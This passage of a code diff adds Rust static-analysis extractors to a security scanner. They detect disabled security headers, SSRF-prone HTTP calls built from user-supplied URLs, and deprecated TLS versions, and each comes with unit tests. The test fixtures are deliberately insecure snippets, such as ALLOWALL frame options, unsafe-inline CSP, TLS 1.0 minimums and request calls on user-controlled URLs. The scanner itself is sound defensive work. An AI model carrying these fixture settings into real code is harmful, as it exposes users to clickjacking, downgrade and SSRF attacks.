|
||||
header,
|
||||
"Django security setting disabled",
|
||||
));
|
||||
}
|
||||
|
||||
// Check YAML disabled patterns
|
||||
if let Some(m) = self.yaml_disabled.find(line) {
|
||||
let header = if line.to_lowercase().contains("frame") {
|
||||
"x_frame_options"
|
||||
} else if line.to_lowercase().contains("xss") {
|
||||
"x_xss_protection"
|
||||
} else if line.to_lowercase().contains("nosniff") {
|
||||
"x_content_type_options"
|
||||
} else {
|
||||
"hsts"
|
||||
};
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
header,
|
||||
"Security header disabled in configuration",
|
||||
));
|
||||
}
|
||||
|
||||
// Check for dangerous X-Frame-Options ALLOWALL
|
||||
if let Some(m) = self.frame_allowall.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"x_frame_options",
|
||||
"X-Frame-Options set to ALLOWALL (clickjacking risk)",
|
||||
));
|
||||
}
|
||||
|
||||
// Check for CSP unsafe patterns
|
||||
if let Some(m) = self.csp_unsafe.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"content_security_policy",
|
||||
"Content-Security-Policy disabled or uses unsafe directives",
|
||||
));
|
||||
}
|
||||
|
||||
// Check for HSTS disabled
|
||||
if let Some(m) = self.hsts_disabled.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"hsts",
|
||||
"Strict-Transport-Security (HSTS) disabled",
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_header_disabled() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
X-Frame-Options: none
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "nginx.conf");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("security_headers"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_django_missing() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
SECURE_BROWSER_XSS_FILTER = False
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "settings.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("Django"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_yaml_disabled() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
x_frame_options: false
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_frame_allowall() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
X-Frame-Options = "ALLOWALL"
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Toml, "config.toml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("clickjacking"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_csp_unsafe() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
Content-Security-Policy: script-src 'unsafe-inline'
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("content_security_policy"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_hsts_disabled() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
Strict-Transport-Security: none
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("hsts"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_hsts_zero() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
HSTS_SECONDS = 0
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "settings.py");
|
||||
|
||||
// Should detect hsts_disabled pattern (HSTS_SECONDS = 0)
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_enabled() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
// Safe: headers enabled
|
||||
let content = r#"
|
||||
X-Frame-Options: SAMEORIGIN
|
||||
X-Content-Type-Options: nosniff
|
||||
SECURE_BROWSER_XSS_FILTER = True
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
}
|
||||
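The `header_disabled` branch above lowercases the line once per comparison. A possible refactoring is sketched here under stated assumptions: `classify_disabled_header` is a hypothetical helper, not part of this commit, and it only reproduces the keyword-to-segment mapping used for explicitly disabled headers.

```rust
/// Hypothetical helper (not part of this commit): maps a line that matched
/// the "explicitly disabled header" pattern to the header segment used in
/// the claim's concept path.
fn classify_disabled_header(line: &str) -> &'static str {
    // Lowercase once and reuse the result for every keyword check.
    let lower = line.to_lowercase();
    if lower.contains("frame") {
        "x_frame_options"
    } else if lower.contains("content-type") {
        "x_content_type_options"
    } else {
        // The pattern only covers three headers, so the remaining case
        // is X-XSS-Protection.
        "x_xss_protection"
    }
}
```

The fallback branch is only correct because the caller has already matched one of the three header names; called on arbitrary text it would misreport `x_xss_protection`.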
393
applications/aphoria/src/extractors/ssrf.rs
Normal file
@ -0,0 +1,393 @@
|
||||
//! Server-Side Request Forgery (SSRF) vulnerability extractor.
|
||||
//!
|
||||
//! Detects patterns where HTTP requests are made with user-controlled URLs,
|
||||
//! which can allow attackers to access internal services or exfiltrate data.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for SSRF vulnerabilities.
|
||||
///
|
||||
/// Detects patterns indicating unsafe URL handling in HTTP requests:
|
||||
/// - HTTP clients (requests, fetch, axios, reqwest) with user-controlled URLs
|
||||
/// - Webhook/callback URLs from user input
|
||||
/// - Image/proxy URLs from request parameters
|
||||
pub struct SsrfExtractor {
|
||||
// Python patterns
|
||||
python_requests: Regex,
|
||||
python_urllib: Regex,
|
||||
python_httpx: Regex,
|
||||
|
||||
// JavaScript/TypeScript patterns
|
||||
js_fetch: Regex,
|
||||
js_axios: Regex,
|
||||
js_got: Regex,
|
||||
|
||||
// Go patterns
|
||||
go_http: Regex,
|
||||
|
||||
// Rust patterns
|
||||
rust_reqwest: Regex,
|
||||
|
||||
// Common sink patterns (all languages)
|
||||
ssrf_sink: Regex,
|
||||
}
|
||||
|
||||
impl Default for SsrfExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl SsrfExtractor {
|
||||
/// Create a new SSRF extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Python: requests with user URL
|
||||
python_requests: Regex::new(
|
||||
r#"requests\.(?:get|post|put|delete|head|patch|request)\s*\(\s*(?:url|uri|target|endpoint|request\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
python_urllib: Regex::new(
|
||||
r#"urllib\.request\.(?:urlopen|Request)\s*\(\s*(?:url|uri|request\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
python_httpx: Regex::new(
|
||||
r#"httpx\.(?:get|post|put|delete|AsyncClient)\s*\([^)]*(?:url|uri|request\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// JavaScript: fetch with user URL
|
||||
js_fetch: Regex::new(
|
||||
r#"fetch\s*\(\s*(?:url|uri|target|endpoint|req\.(?:query|params|body)\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
js_axios: Regex::new(
|
||||
r#"axios\.(?:get|post|put|delete|request)\s*\(\s*(?:url|uri|target|endpoint)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
js_got: Regex::new(
|
||||
r#"got\s*\(\s*(?:url|uri|target|endpoint)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Go: http.Get with user URL
|
||||
go_http: Regex::new(
|
||||
r#"http\.(?:Get|Post|Head|PostForm|NewRequest)\s*\(\s*(?:url|uri|target|endpoint|r\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Rust: reqwest with user URL
|
||||
rust_reqwest: Regex::new(
|
||||
r#"reqwest::(?:get|Client).*\(\s*(?:url|&url|format!|user)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Common sink patterns - URLs that look user-controlled
|
||||
ssrf_sink: Regex::new(
|
||||
r#"(?i)(?:proxy_url|image_url|webhook_url|callback_url|redirect_url|target_url|remote_url|external_url)\s*[:=]\s*(?:request\.|params\.|req\.Query)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
category: &str,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["network", "ssrf", category],
|
||||
"request_url_source",
|
||||
ObjectValue::Text("user_controlled".to_string()),
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
0.85,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for SsrfExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"ssrf"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[
|
||||
Language::Python,
|
||||
Language::JavaScript,
|
||||
Language::TypeScript,
|
||||
Language::Go,
|
||||
Language::Rust,
|
||||
]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
// Check for common sink patterns (all languages)
|
||||
if let Some(m) = self.ssrf_sink.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"url_sink",
|
||||
"URL variable populated from user input (SSRF risk)",
|
||||
));
|
||||
}
|
||||
|
||||
// Language-specific patterns
|
||||
match language {
|
||||
Language::Python => {
|
||||
if let Some(m) = self.python_requests.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"http_client",
|
||||
"requests library with user-controlled URL (SSRF risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.python_urllib.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"http_client",
|
||||
"urllib with user-controlled URL (SSRF risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.python_httpx.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"http_client",
|
||||
"httpx with user-controlled URL (SSRF risk)",
                        ));
                    }
                }
                Language::JavaScript | Language::TypeScript => {
                    if let Some(m) = self.js_fetch.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "http_client",
                            "fetch with user-controlled URL (SSRF risk)",
                        ));
                    }
                    if let Some(m) = self.js_axios.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "http_client",
                            "axios with user-controlled URL (SSRF risk)",
                        ));
                    }
                    if let Some(m) = self.js_got.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "http_client",
                            "got with user-controlled URL (SSRF risk)",
                        ));
                    }
                }
                Language::Go => {
                    if let Some(m) = self.go_http.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "http_client",
                            "http.Get/Post with user-controlled URL (SSRF risk)",
                        ));
                    }
                }
                Language::Rust => {
                    if let Some(m) = self.rust_reqwest.find(line) {
                        claims.push(Self::make_claim(
                            path_segments,
                            file,
                            line_num,
                            m.as_str(),
                            "http_client",
                            "reqwest with user-controlled URL (SSRF risk)",
                        ));
                    }
                }
                _ => {}
            }
        }

        claims
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_python_requests() {
        let extractor = SsrfExtractor::new();
        let content = r#"
            response = requests.get(url)
        "#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "api.py");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].concept_path.contains("network/ssrf"));
    }

    #[test]
    fn test_python_requests_user_input() {
        let extractor = SsrfExtractor::new();
        let content = r#"
            response = requests.post(request.json['webhook_url'], data=payload)
        "#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "webhook.py");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_python_urllib() {
        let extractor = SsrfExtractor::new();
        let content = r#"
            data = urllib.request.urlopen(url).read()
        "#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "fetch.py");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_js_fetch() {
        let extractor = SsrfExtractor::new();
        let content = r#"
            const data = await fetch(url);
        "#;

        let claims =
            extractor.extract(&["js".to_string()], content, Language::JavaScript, "api.js");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_js_axios() {
        let extractor = SsrfExtractor::new();
        let content = r#"
            const response = await axios.get(url);
        "#;

        let claims =
            extractor.extract(&["js".to_string()], content, Language::JavaScript, "api.js");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_go_http() {
        let extractor = SsrfExtractor::new();
        let content = r#"
            resp, err := http.Get(url)
        "#;

        let claims = extractor.extract(&["go".to_string()], content, Language::Go, "client.go");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_rust_reqwest() {
        let extractor = SsrfExtractor::new();
        let content = r#"
            let body = reqwest::get(url).await?.text().await?;
        "#;

        let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "client.rs");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_ssrf_sink_pattern() {
        let extractor = SsrfExtractor::new();
        let content = r#"
            proxy_url = req.Query("proxy")
        "#;

        let claims = extractor.extract(&["go".to_string()], content, Language::Go, "proxy.go");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].description.contains("URL variable"));
    }

    #[test]
    fn test_webhook_url_sink() {
        let extractor = SsrfExtractor::new();
        let content = r#"
            webhook_url = request.json.get('callback')
        "#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "webhook.py");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_no_false_positives_hardcoded() {
        let extractor = SsrfExtractor::new();
        // Safe: hardcoded URL
        let content = r#"
            response = requests.get("https://api.example.com/data")
        "#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "api.py");

        assert!(claims.is_empty());
    }
}
@@ -37,6 +37,18 @@ pub struct TlsVersionExtractor {

    // Config file patterns (YAML, TOML, JSON)
    config_min_version: Regex,

    // Semantic patterns (variable name suggests TLS + value is deprecated)
    semantic_tls_version: Regex,

    // Environment variable patterns
    env_tls_version: Regex,

    // Terraform HCL patterns
    terraform_tls: Regex,

    // Kubernetes camelCase patterns (YAML)
    k8s_tls: Regex,
}

impl Default for TlsVersionExtractor {
@@ -89,6 +101,40 @@ impl TlsVersionExtractor {
                r#"(?i)(?:min_version|tls_min_version|minimum_tls_version|ssl_min_version)\s*[:=]\s*["']?(?:1\.[01]|TLSv?1(?:\.[01])?|SSL(?:v?3)?|TLS10|TLS11)["']?"#,
            )
            .expect("valid regex"),

            // Semantic: variable name contains tls/ssl and min/version in any order
            // Covers common patterns: TLS_MIN_VERSION, MIN_TLS_VERSION, SSL_VERSION, sslVersion, tlsMinVersion
            // Pattern 1: (tls|ssl) followed by min/version (e.g., TLS_MIN_VERSION, ssl_version)
            // Pattern 2: (min|version) followed by tls/ssl (e.g., MIN_TLS, VERSION_SSL)
            // Pattern 3: camelCase (e.g., sslVersion, tlsMinVersion, minTlsVersion)
            // Value must be terminated by quote, end of word, or end of line to avoid matching "TLS1_2" as "TLS1"
            // Allow optional type annotations (e.g., Rust `: &str`) between name and value
            semantic_tls_version: Regex::new(
                r#"(?i)\b(?:(?:tls|ssl)[_A-Z]*(?:min(?:imum)?|version)|(?:min(?:imum)?|version)[_A-Z]*(?:tls|ssl)|(?:tls|ssl)[A-Z][a-z]*(?:Version|Min)|(?:min|version)[A-Z][a-z]*(?:Tls|Ssl))\w*(?:\s*:\s*[^=]+)?\s*=\s*["']?(1\.[01]|TLSv?1(?:\.[01])?|SSL(?:v?[23])?)(?:["'\s;]|$)"#,
            )
            .expect("valid regex"),

            // Environment variables (NAME=value, with optional export)
            // Catches: TLS_MIN_VERSION=1.0, export SSL_VERSION=TLSv1
            env_tls_version: Regex::new(
                r#"(?i)^(?:export\s+)?(\w*(?:tls|ssl)\w*(?:_?(?:min|version))+\w*)\s*=\s*["']?(1\.[01]|TLSv?1(?:\.[01])?|SSL(?:v?[23])?)["']?\s*$"#,
            )
            .expect("valid regex"),

            // Terraform HCL patterns
            // Catches: min_tls_version = "TLS1_0", ssl_minimum_protocol_version = "TLSv1"
            // The value must be a complete deprecated version - use word boundary or quote/end
            terraform_tls: Regex::new(
                r#"(?i)(?:min(?:imum)?_)?(?:tls|ssl)(?:_(?:protocol_)?)?version\s*=\s*["']?(?:TLS_?1_?[01]|TLSv1(?:\.[01])?|1\.[01]|SSL(?:v?[23])?)(?:["'\s]|$)"#,
            )
            .expect("valid regex"),

            // Kubernetes camelCase patterns (YAML)
            // Catches: minTLSVersion: VersionTLS10, tlsMinVersion: "1.0"
            // The value must be followed by a quote, whitespace, or end of input
            // so that a safe value such as TLSv1.2 is not matched as "TLSv1"
            k8s_tls: Regex::new(
                r#"(?i)(?:min)?(?:tls|ssl)(?:Min)?(?:Version|Protocol)\s*:\s*["']?(?:VersionTLS1[01]|VersionSSL30|TLSv?1(?:\.[01])?|1\.[01]|SSL(?:v?[23])?)(?:["'\s]|$)"#,
            )
            .expect("valid regex"),
        }
    }

@@ -141,6 +187,8 @@ impl Extractor for TlsVersionExtractor {
            Language::Yaml,
            Language::Toml,
            Language::Json,
            Language::Terraform,
            Language::Dotenv,
        ]
    }

@@ -267,214 +315,56 @@ impl Extractor for TlsVersionExtractor {
                    "deprecated",
                    "Deprecated TLS version in configuration (RFC 8996)",
                ));
                // Kubernetes camelCase patterns for YAML
                if language == Language::Yaml {
                    claims.extend(self.check_pattern(
                        content,
                        &self.k8s_tls,
                        path_segments,
                        file,
                        "deprecated",
                        "Kubernetes minTLSVersion set to deprecated value (RFC 8996)",
                    ));
                }
            }
            Language::Terraform => {
                claims.extend(self.check_pattern(
                    content,
                    &self.terraform_tls,
                    path_segments,
                    file,
                    "deprecated",
                    "Terraform TLS configuration uses deprecated version (RFC 8996)",
                ));
            }
            Language::Dotenv => {
                claims.extend(self.check_pattern(
                    content,
                    &self.env_tls_version,
                    path_segments,
                    file,
                    "deprecated",
                    "Environment variable sets deprecated TLS version (RFC 8996)",
                ));
            }
            _ => {}
        }

        // Apply semantic pattern to all languages (cross-language)
        // This catches patterns like: const TLS_MIN_VERSION = "1.0"
        claims.extend(self.check_pattern(
            content,
            &self.semantic_tls_version,
            path_segments,
            file,
            "deprecated",
            "Semantic: Variable name suggests TLS version, value is deprecated (RFC 8996)",
        ));

        claims
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_rust_tls10_detection() {
        let extractor = TlsVersionExtractor::new();
        // Content with TLS10 on two lines - should find 2 matches
        let content = r#"
            use rustls::version::TLS10;
            config.min_protocol_version = Some(TLS10);
        "#;

        let claims =
            extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");

        // Both lines match TLS10 pattern
        assert_eq!(claims.len(), 2);
        assert!(claims.iter().all(|c| c.value == ObjectValue::Text("1.0".to_string())));
    }

    #[test]
    fn test_rust_tls11_detection() {
        let extractor = TlsVersionExtractor::new();
        let content = r#"
            let version = TLS1_1;
        "#;

        let claims =
            extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");

        assert_eq!(claims.len(), 1);
        assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
    }

    #[test]
    fn test_go_version_tls10_detection() {
        let extractor = TlsVersionExtractor::new();
        let content = r#"
            cfg := &tls.Config{
                MinVersion: tls.VersionTLS10,
            }
        "#;

        let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");

        assert_eq!(claims.len(), 1);
        assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
    }

    #[test]
    fn test_go_version_tls11_detection() {
        let extractor = TlsVersionExtractor::new();
        let content = r#"
            cfg := &tls.Config{
                MinVersion: tls.VersionTLS11,
            }
        "#;

        let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");

        assert_eq!(claims.len(), 1);
        assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
    }

    #[test]
    fn test_python_tls_version_detection() {
        let extractor = TlsVersionExtractor::new();
        let content = r#"
            import ssl
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
            ctx.minimum_version = ssl.TLSVersion.TLSv1_1
        "#;

        let claims =
            extractor.extract(&["python".to_string()], content, Language::Python, "server.py");

        // Should detect both TLSv1 and TLSv1_1
        assert_eq!(claims.len(), 2);
    }

    #[test]
    fn test_js_min_version_detection() {
        let extractor = TlsVersionExtractor::new();
        let content = r#"
            const server = https.createServer({
                minVersion: 'TLSv1',
                key: fs.readFileSync('key.pem')
            });
        "#;

        let claims =
            extractor.extract(&["js".to_string()], content, Language::JavaScript, "server.js");

        assert_eq!(claims.len(), 1);
        assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
    }

    #[test]
    fn test_js_secure_protocol_detection() {
        let extractor = TlsVersionExtractor::new();
        let content = r#"
            const options = {
                secureProtocol: 'TLSv1_method'
            };
        "#;

        let claims =
            extractor.extract(&["js".to_string()], content, Language::JavaScript, "client.js");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_yaml_min_version_detection() {
        let extractor = TlsVersionExtractor::new();
        let content = r#"
            tls:
              min_version: "1.0"
              cert_file: /etc/certs/server.crt
        "#;

        let claims = extractor.extract(
            &["config".to_string()],
            content,
            Language::Yaml,
            "config/production.yaml",
        );

        assert_eq!(claims.len(), 1);
        assert_eq!(claims[0].value, ObjectValue::Text("deprecated".to_string()));
    }

    #[test]
    fn test_yaml_tls_min_version_detection() {
        let extractor = TlsVersionExtractor::new();
        let content = r#"
            server:
              tls_min_version: TLSv1.1
        "#;

        let claims =
            extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");

        assert_eq!(claims.len(), 1);
    }

    #[test]
    fn test_no_false_positives_tls12() {
        let extractor = TlsVersionExtractor::new();
        let content = r#"
            cfg := &tls.Config{
                MinVersion: tls.VersionTLS12,
            }
        "#;

        let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");

        assert!(claims.is_empty());
    }

    #[test]
    fn test_no_false_positives_tls13() {
        let extractor = TlsVersionExtractor::new();
        let content = r#"
            use rustls::version::TLS13;
            config.min_protocol_version = Some(TLS13);
        "#;

        let claims =
            extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");

        assert!(claims.is_empty());
    }

    #[test]
    fn test_no_false_positives_modern_config() {
        let extractor = TlsVersionExtractor::new();
        let content = r#"
            tls:
              min_version: "1.2"
              max_version: "1.3"
        "#;

        let claims =
            extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");

        assert!(claims.is_empty());
    }

    #[test]
    fn test_concept_path_structure() {
        let extractor = TlsVersionExtractor::new();
        let content = r#"
            cfg := &tls.Config{MinVersion: tls.VersionTLS10}
        "#;

        let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");

        assert_eq!(claims.len(), 1);
        assert!(claims[0].concept_path.contains("tls/min_version"));
    }
}
#[path = "tls_version_tests.rs"]
mod tests;

362
applications/aphoria/src/extractors/tls_version_tests.rs
Normal file
@@ -0,0 +1,362 @@
//! Tests for TLS version extractor.

// This file is included from tls_version.rs via `#[path]`, so `super` is the
// `tls_version` module itself.
use super::TlsVersionExtractor;
use super::Extractor;
use crate::types::Language;
use stemedb_core::types::ObjectValue;

#[test]
fn test_rust_tls10_detection() {
    let extractor = TlsVersionExtractor::new();
    // Content with TLS10 on two lines - should find 2 matches
    let content = r#"
        use rustls::version::TLS10;
        config.min_protocol_version = Some(TLS10);
    "#;

    let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");

    // Both lines match TLS10 pattern
    assert_eq!(claims.len(), 2);
    assert!(claims.iter().all(|c| c.value == ObjectValue::Text("1.0".to_string())));
}

#[test]
fn test_rust_tls11_detection() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        let version = TLS1_1;
    "#;

    let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");

    assert_eq!(claims.len(), 1);
    assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
}

#[test]
fn test_go_version_tls10_detection() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        cfg := &tls.Config{
            MinVersion: tls.VersionTLS10,
        }
    "#;

    let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");

    assert_eq!(claims.len(), 1);
    assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
}

#[test]
fn test_go_version_tls11_detection() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        cfg := &tls.Config{
            MinVersion: tls.VersionTLS11,
        }
    "#;

    let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");

    assert_eq!(claims.len(), 1);
    assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
}

#[test]
fn test_python_tls_version_detection() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        import ssl
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.minimum_version = ssl.TLSVersion.TLSv1_1
    "#;

    let claims = extractor.extract(&["python".to_string()], content, Language::Python, "server.py");

    // Should detect both TLSv1 and TLSv1_1
    assert_eq!(claims.len(), 2);
}

#[test]
fn test_js_min_version_detection() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        const server = https.createServer({
            minVersion: 'TLSv1',
            key: fs.readFileSync('key.pem')
        });
    "#;

    let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "server.js");

    assert_eq!(claims.len(), 1);
    assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
}

#[test]
fn test_js_secure_protocol_detection() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        const options = {
            secureProtocol: 'TLSv1_method'
        };
    "#;

    let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "client.js");

    assert_eq!(claims.len(), 1);
}

#[test]
fn test_yaml_min_version_detection() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        tls:
          min_version: "1.0"
          cert_file: /etc/certs/server.crt
    "#;

    let claims = extractor.extract(
        &["config".to_string()],
        content,
        Language::Yaml,
        "config/production.yaml",
    );

    assert_eq!(claims.len(), 1);
    assert_eq!(claims[0].value, ObjectValue::Text("deprecated".to_string()));
}

#[test]
fn test_yaml_tls_min_version_detection() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        server:
          tls_min_version: TLSv1.1
    "#;

    let claims = extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");

    // May match both config pattern and semantic pattern
    assert!(!claims.is_empty());
    assert!(claims.iter().any(|c| c.value == ObjectValue::Text("deprecated".to_string())));
}

#[test]
fn test_no_false_positives_tls12() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        cfg := &tls.Config{
            MinVersion: tls.VersionTLS12,
        }
    "#;

    let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");

    assert!(claims.is_empty());
}

#[test]
fn test_no_false_positives_tls13() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        use rustls::version::TLS13;
        config.min_protocol_version = Some(TLS13);
    "#;

    let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");

    assert!(claims.is_empty());
}

#[test]
fn test_no_false_positives_modern_config() {
    let extractor = TlsVersionExtractor::new();
    let content = r#"
        tls:
          min_version: "1.2"
          max_version: "1.3"
    "#;

